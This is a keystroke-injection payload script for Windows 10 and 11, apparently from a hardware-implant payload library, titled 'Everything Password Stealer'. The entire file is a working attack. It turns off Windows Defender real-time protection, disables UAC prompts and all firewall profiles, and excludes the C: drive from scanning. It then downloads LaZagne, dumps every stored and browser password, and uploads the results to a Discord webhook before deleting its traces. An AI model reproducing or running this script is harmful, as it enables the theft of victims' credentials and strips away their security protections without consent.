omg-payloads/payloads/library/exfiltration/Everything-Password-Stealer/payload.txt

73 lines
2.0 KiB
Plaintext

REM Title: Everything Password Stealer
REM Description: Steals every password in every windows 10 or 11 passwords with LaZagne
REM Bypasses UAC, Firewall, and Defender with persistence whatsoever
REM Exfil your data to your not-so private discord server with computer name as a filename (to avoid confusions as usual)
REM Author: DeadPool (just kidding, created by me, the one and only Spade)
GUI m
DELAY 2000
REM Open Windows Defender Settings
CTRL ESC
DELAY 750
STRING windows security
ENTER
DELAY 1500
ENTER
REM Navigate to Manage Settings
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 500
REM Open and turn off Realtime Protection
SPACE
DELAY 1000
ALT y
DELAY 1000
REM Exit security settings
ALT F4
DELAY 3000
GUI r
DELAY 1000
REM Open the Powershell as Administrator
STRING powershell
CTRL-SHIFT ENTER
DELAY 2000
ALT y
ENTER
DELAY 1000
REM Disabling the UAC
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 1000
REM Disabling the Firewall Part 1
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
REM Disabling the Firewall Part 2
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 1000
REM Disabling the Virus and Threat Protection
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
DELAY 1000
STRING Add-MpPreference -ExclusionPath "C:"
ENTER
DELAY 3000
STRING $Test = [System.Environment]::GetEnvironmentVariable('TEMP','Machine');Start-BitsTransfer https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe -Destination "$Test/l.exe"; cd $Test
ENTER
DELAY 15000
STRING .\l.exe all -vv > "$env:computername.txt"; .\l.exe browsers -vv >> "$env:computername.txt"; curl.exe [DISCORD WEBHOOK URL] -F "file1=@$Test/$env:computername.txt"; Remove-Item "$x/$env:computername.txt", "$x/l.exe" -Force -ErrorAction SilentlyContinue
ENTER
STRING exit
ENTER
REM Done